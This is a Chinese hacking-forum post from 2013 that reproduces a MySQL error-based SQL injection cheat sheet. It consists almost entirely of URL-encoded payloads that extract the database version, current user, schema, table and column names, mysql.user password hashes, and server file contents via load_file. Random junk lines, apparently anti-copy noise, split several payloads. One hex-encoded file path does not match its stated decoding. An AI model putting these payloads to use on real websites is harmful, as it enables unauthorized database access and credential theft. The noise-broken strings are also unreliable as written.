Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
3 m6 a5 d: N! ^% T) g7 F: J1 p
" ?3 G' S7 F6 g
Mysql暴错注入参考（pdf），每天一贴。。。
! J8 m- P: M5 @* g% H* G) R: B2 P
MySql Error Based Injection Reference
+ U. d9 j6 u, D. v4 l  r1 F[Mysql暴错注入参考]
! H, M) z# g' R: y7 m5 ?$ gAuthornig0s1992
0 z( y, n- z# T) v5 _Blog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
- X- h" Q' ?4 ]* Z; L. Ojoin+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
/ G* B% v' C  a- d! d* cup by a)b)
查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
3 S/ @* ?* R3 t4 U. i' Dand(0)*2))x+from+information_schema.tables+group+by+x)a)
0 z* a) \, c. q, f# W4 q5 U查询当前数据库:
: F) C6 ?0 Z: h7 A- ~5 O5 ]% WMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
5 V/ s' X8 i' A* }( J* S' X5 t; nLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
" k: S" s/ U7 N; |2 a+ b4 f顺序替换
爆指定库数目:
4 \/ D: v* W2 e) d% _9 Oand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
2 s3 r' x8 w8 l: D4 A+ m2 ?依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
: A  t+ K7 O/ }4 j0 }3 w6 U9 z: iable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
4 o$ X  a$ S  S* Hbles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
' ^+ ^% `, L( L0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
6 m! E, z8 D' Q9 p( U, I) [- F! E5 U依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
3 s6 U! a" I1 h+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
) e, r+ h) x2 bloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
4 q! s) X5 l. O) R4 ]6 T! |依次暴内容:
; r9 p0 B* A# o$ a4 R4 l% Qand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
3 v$ u- A  v2 \& a( ]) E+ d- sma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
7 r' O$ {0 c/ ]6 g将n顺序替换
9 N# d" C$ Z, W% X5 [2 D( Z爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
6 Y- A- V% F4 S2 G9 \from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
+ A% R9 q9 R9 Z  ~Thx for reading.

不要下载也可以，
( O% H/ Q$ @# d5 i